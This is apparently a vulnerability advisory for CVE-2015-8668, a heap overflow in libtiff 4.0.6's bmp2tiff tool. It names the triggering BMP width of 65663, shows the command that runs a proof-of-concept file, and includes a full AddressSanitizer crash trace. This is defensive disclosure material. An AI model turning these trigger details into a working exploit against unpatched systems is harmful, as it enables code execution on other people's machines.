libtiff bmp file Heap Overflow (CVE-2015-8668)

Details
=======

Product: libtiff
Affected Versions: <= 4.0.6
Vulnerability Type: Heap Overflow
Security Risk: High
Vendor URL: http://www.libtiff.org/
CVE ID: CVE-2015-8668
Credit: riusksk of Tencent Security Platform Department

Introduction
============

 libtiff  v4.0.6 bmp2tiff function PackBitsPreEncode() (./libtiff/tif_packbits.c ) handle malicious bmp file (Width = 65663) to cause memory corruption. An attacker could exploit this issue to execute arbitrary code in the context of the application using the library. Failed exploit attempts may result in denial-of-service conditions.

&#9581;&#9472;riusksk@MacBook  ~/Downloads 魚
&#9584;&#9472;&#10148;$ ./tiff-4.0.6/tools/bmp2tiff ./libtiff-poc.bmp out.tif                                                   255 &#8629;
============================================================
=====
==54340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100001087f at pc 0x00010cdc0532 bp 0x7fff52f459b0 sp 0x7fff52f459a8
READ of size 1 at 0x63100001087f thread T0
    #0 0x10cdc0531 in PackBitsEncode (/Users/riusksk/Downloads/./tiff-4.0.6/tools/bmp2tiff+0x100108531)
    #1 0x10cdfaa18 in TIFFWriteScanline (/Users/riusksk/Downloads/./tiff-4.0.6/tools/bmp2tiff+0x100142a18)
    #2 0x10ccbde7b in main (/Users/riusksk/Downloads/./tiff-4.0.6/tools/bmp2tiff+0x100005e7b)
    #3 0x7fff8dcbc5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
    #4 0x2  (<unknown module>)

0x63100001087f is located 0 bytes to the right of 65663-byte region [0x631000000800,0x63100001087f)
allocated by thread T0 here:
    #0 0x10cefdf60 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/7.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x42f60)
    #1 0x10ce073bf in _TIFFmalloc (/Users/riusksk/Downloads/./tiff-4.0.6/tools/bmp2tiff+0x10014f3bf)
    #2 0x10ccbc9d5 in main (/Users/riusksk/Downloads/./tiff-4.0.6/tools/bmp2tiff+0x1000049d5)
    #3 0x7fff8dcbc5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
    #4 0x2  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 PackBitsEncode
Shadow bytes around the buggy address:
  0x1c62000020b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c62000020c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c62000020d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c62000020e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c62000020f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c6200002100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[07]
  0x1c6200002110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c6200002120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c6200002130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c6200002140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c6200002150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==54340==ABORTING
[1]    54340 abort      ./tiff-4.0.6/tools/bmp2tiff ./libtiff-poc.bmp out.tif